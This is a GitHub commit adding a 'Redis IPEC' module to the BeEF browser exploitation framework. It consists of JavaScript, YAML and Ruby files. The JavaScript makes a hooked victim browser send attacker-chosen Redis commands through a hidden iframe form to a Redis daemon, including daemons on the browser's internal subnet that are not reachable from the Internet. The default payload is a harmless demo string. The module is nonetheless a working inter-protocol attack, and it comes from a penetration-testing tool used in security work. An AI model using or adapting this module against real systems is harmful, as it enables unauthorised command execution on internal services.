Permalink
Browse files

Add Redis IPEC module

  • Loading branch information...
1 parent 9060e4c commit 1f83c2a63fcb92a0a96c41daed333966b3c6f38c @bcoles bcoles committed Jan 8, 2014
@@ -0,0 +1,46 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ // validate payload
+ try {
+ var cmd = '<%= @commands.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+ } catch(e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+ return;
+ }
+
+ // validate target host
+ var rhost = "<%= @rhost %>";
+ if (!rhost) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
+ return;
+ }
+
+ // validate target port
+ var rport = "<%= @rport %>";
+ if (!rport || rport > 65535 || rport < 0 || isNaN(rport)) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
+ return;
+ }
+
+ // validate timeout
+ var timeout = "<%= @timeout %>";
+ if (isNaN(timeout)) timeout = 30;
+
+ // send commands
+ var redis_ipec_form_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", cmd);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Redis commands sent');
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(redis_ipec_form_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout * 1000);
+
+});
+
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ inter_protocol_redis:
+ enable: true
+ category: "IPEC"
+ name: "Redis"
+ description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Redis daemon on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the Redis commands are not returned to BeEF.<br/><br/>Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines."
+ authors: ["bcoles"]
+ target:
+ working: ["FF", "C"]
+ not_working: ["IE"]
+ unknown: ["S", "O"]
@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Inter_protocol_redis < BeEF::Core::Command
+
+ def self.options
+ cmd = 'set server:name "BeEF says:\\\\nm00!"\\nquit\\n'
+ return [
+ {'name'=>'rhost', 'ui_label'=>'Target Address', 'value'=>'127.0.0.1'},
+ {'name'=>'rport', 'ui_label'=>'Target Port', 'value'=>'6379'},
+ {'name'=>'timeout', 'ui_label'=>'Timeout (s)', 'value'=>'15'},
+ {'name'=>'commands','ui_label'=>'Redis commands', 'description'=>"Enter Redis commands to execute. Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines.", 'type'=>'textarea', 'value'=>cmd, 'width'=>'200px' }
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result'] if not @datastore['result'].nil?
+ content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
+ save content
+ end
+end

0 comments on commit 1f83c2a

Please sign in to comment.